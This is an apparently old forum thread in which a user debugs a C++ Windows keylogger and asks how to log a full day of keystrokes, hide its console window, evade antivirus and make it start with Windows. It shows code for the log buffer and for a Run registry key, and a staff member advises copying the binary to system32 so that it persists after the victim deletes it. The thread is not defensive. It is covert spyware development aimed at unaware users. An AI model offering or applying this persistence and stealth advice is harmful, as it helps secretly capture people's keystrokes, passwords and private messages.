(C++) keylogger code question

Questions about programming languages and debugging
Post Reply
User avatar
Still_Learning
Fame ! Where are the chicks?!
Fame ! Where are the chicks?!
Posts: 1040
Joined: 11 Jun 2008, 16:00
15
Location: Trigger City

(C++) keylogger code question

Post by Still_Learning »

Ok I have this code, and it works but for some reason it does not save that much to the text file that has all the keystrokes in it (it only saves a keylogged file of like the newest 5 lines or 10 words). Im trying to get it to save everything typed in within a 24 hour period or so, not just the last 10 words typed. I tried changeing #'s in the variables and such to get it to save more information then a 1k textfile but have not gotten it to work yet, it also flashs a small black dos screen for like half of a second when loaded which would be noticable for a user running it, i posted the link for the code below, thanks

http://code.suck-o.com/92

User avatar
ayu
Staff
Staff
Posts: 8109
Joined: 27 Aug 2005, 16:00
18
Contact:

Post by ayu »

Well it seems like when the logfile reaches "LogLength" it will close the file and then reopen it, causing the data to be overwritten. So I guess you could either change the "LogLength" limit, or rewrite the if statement further down so that it stops at a specific time.

It's odd though, because it reads it into buffer, and then closes the file. Then opens it again. You would think that it would flush the buffer into the file again after that. But it has a maximum buffer, and also it has a "sleep 10" further up to make it not use 100% cpu.

Changing this if statement, seems to be the most logical thing to do ^^, I haven't read all the code, but that's my conclusion from just waking up.

Code: Select all

if(len>=LogLength)
{

fseek(file,0,SEEK_SET);//go to beg.
buf=(char *)malloc(len);//malloc buffer
freadindex=fread(buf,1,len,file);//read into buffer
buf[freadindex] = '\0';//Extra bit I have to add to make it a sting
fclose(file);
file = fopen(FileName,"w");
}
"The best place to hide a tree, is in a forest"

User avatar
Still_Learning
Fame ! Where are the chicks?!
Fame ! Where are the chicks?!
Posts: 1040
Joined: 11 Jun 2008, 16:00
15
Location: Trigger City

Post by Still_Learning »

I tried changing to log length from 100 to 1000 but did not see a difference when the log file was created.

Wouldnt not useing 100% be more stealth? as of now i ran it threw AVG scanner and it is undetectable, but Comodo firewall catches it (if you read the info before clicking "Allow")..

what would you recommend changeing in the IF statement? Im a noob at this , this is my first C++ project i guess, but am learning alot by doing this , thanks Cats!

User avatar
ayu
Staff
Staff
Posts: 8109
Joined: 27 Aug 2005, 16:00
18
Contact:

Post by ayu »

Well there are some oddities in the code, and I can't really go through it all at the moment (studying for an exam), but you can try to remove or lessen "sleep 10", to "sleep 1" or something, to see if it does anything. Because as it looks now, it puts the whole program to sleep for 10 seconds, then continues to check for keys, but i guess it would work if it reads from the buffer and then flushes to the file.

I can take a closer look at it later, the "check char" part looks pretty good though ^^.
"The best place to hide a tree, is in a forest"

User avatar
Still_Learning
Fame ! Where are the chicks?!
Fame ! Where are the chicks?!
Posts: 1040
Joined: 11 Jun 2008, 16:00
15
Location: Trigger City

Post by Still_Learning »

Ok, I think i have it working now.. the only question now i guess is why wont it run automatically when windows starts up? I can see where the registry key was added with the code

Code: Select all

/* Grab filename of process/exe using GetModuleFileName() function. */
    TCHAR szPath[MAX_PATH];

 
    GetModuleFileName(NULL,
                      szPath,
                      MAX_PATH);

 
    /* Create a New HKEY. */
    HKEY newValue;
 
    /* Open Registry key. */

    RegOpenKey(HKEY_LOCAL_MACHINE,
               "Software\\Microsoft\\Windows\\CurrentVersion\\Run",

               &newValue);
 
    /* Note use HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run to add for the

        current user only.
 
        Now give a new value.
 
        Syntax for RegSetValueEx() function is
        LONG WINAPI RegSetValueEx(
        __in        HKEY hKey,
        __in_opt    LPCTSTR lpValueName,

        __reserved  DWORD Reserved,
        __in        DWORD dwType,
        __in_opt    const BYTE* lpData,
        __in        DWORD cbData
        );
 
        More info at http://msdn2.microsoft.com/en-us/library/ms724923.aspx */

 
    RegSetValueEx(newValue,
                  "keylogger2.exe",
                  0,

                  REG_SZ,
                  (LPBYTE)szPath,
                  sizeof(szPath));

 
    /* Close the key. */
    RegCloseKey(newValue);
    return 0;
when i run it, i can see it in the processess and see the key logging working, but on restart it does not seem to be working / autorun..

what am i doing wrong :oops:

so far i want the keylogger to auto start on windows boot and write to the log file , thats it.. and to make it as stealth as possible so far, ive gotten it to just flash a black dos screen for like half a second, no flashing screen would be best though.. any sugestions for a fix?

the new code is at http://code.suck-o.com/93

User avatar
ayu
Staff
Staff
Posts: 8109
Joined: 27 Aug 2005, 16:00
18
Contact:

Post by ayu »

well did you check the registry to see that it adds the key? and is your file named "keylogger2.exe" as it says in the code? and is the path for the file added correctly.

A tip is to make a syscall and have the system copy the file to a specified location (like system32) and then make the key point to the file there, so even if the user removes the file that he/she ran, it would still run from system32 the next time. Also, make sure that the program "checks" if the file exists in system32, before it tries to copy the file (no use doing it if it already exists)
"The best place to hide a tree, is in a forest"

User avatar
Still_Learning
Fame ! Where are the chicks?!
Fame ! Where are the chicks?!
Posts: 1040
Joined: 11 Jun 2008, 16:00
15
Location: Trigger City

Post by Still_Learning »

Yes the registry setting is there, and the name "keylogger2.exe" is right, paths are correct but still does not load at the start of windows..

how do i determine how big of a logfile it creates?

User avatar
ayu
Staff
Staff
Posts: 8109
Joined: 27 Aug 2005, 16:00
18
Contact:

Post by ayu »

I'm a little confused by the code now ^^

The part with the filesize is nowhere to be found now =/

and main is ending before it gets to the last loop it seems, and the last loop is endless.
"The best place to hide a tree, is in a forest"

User avatar
Still_Learning
Fame ! Where are the chicks?!
Fame ! Where are the chicks?!
Posts: 1040
Joined: 11 Jun 2008, 16:00
15
Location: Trigger City

Post by Still_Learning »

humm... how would I make it to log up to say 5 MB of keys, then it will keep overwriteing the oldest text with newer after it hits the 5MB mark?

I am not sure how to define the filesize..

or why it is not booting along with windows ...

:?: Bad Brain, DNR, Floodhoundz, anyone else have an idea or helpful advice? the code compiles and works, but not how i want it to yet, thanks

User avatar
ayu
Staff
Staff
Posts: 8109
Joined: 27 Aug 2005, 16:00
18
Contact:

Post by ayu »

Well, as mentioned in the code....

Code: Select all

/* Note use HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run to add for the

        current user only. 
Try that instead (it should work anyway, but since I don't have Windows, I can't and wont test the code)
"The best place to hide a tree, is in a forest"

User avatar
qeinar
Newbie
Newbie
Posts: 1
Joined: 28 Oct 2008, 17:00
15

Post by qeinar »

the sleep function is given in milisecounds so sleep(1) would be close to nothing.. for the showing screen, it's just howl ong time it takes to execute the stealth comand your using.

User avatar
ayu
Staff
Staff
Posts: 8109
Joined: 27 Aug 2005, 16:00
18
Contact:

Post by ayu »

qeinar wrote:the sleep function is given in milisecounds so sleep(1) would be close to nothing.. for the showing screen, it's just howl ong time it takes to execute the stealth comand your using.
ah yes that is correct, I was referring to the system call. My apologies
"The best place to hide a tree, is in a forest"

User avatar
Still_Learning
Fame ! Where are the chicks?!
Fame ! Where are the chicks?!
Posts: 1040
Joined: 11 Jun 2008, 16:00
15
Location: Trigger City

Post by Still_Learning »

qeinar wrote:the sleep function is given in milisecounds so sleep(1) would be close to nothing.. for the showing screen, it's just howl ong time it takes to execute the stealth comand your using.
Yeah but it still shows :(

Even with sleep(0) it flashes real quick

also am having other bugs, anyone want to co-help on making a keylogger? I am trying to learn C++ and figured this would be a nice project, cats you are also learning correct? lets collaborate on a keylogger

:twisted:

User avatar
ayu
Staff
Staff
Posts: 8109
Joined: 27 Aug 2005, 16:00
18
Contact:

Post by ayu »

I have enough work to do at Uni, so I think I'll pass this time =)
"The best place to hide a tree, is in a forest"

User avatar
Still_Learning
Fame ! Where are the chicks?!
Fame ! Where are the chicks?!
Posts: 1040
Joined: 11 Jun 2008, 16:00
15
Location: Trigger City

Post by Still_Learning »

cats wrote:I have enough work to do at Uni, so I think I'll pass this time =)
8O ok

Post Reply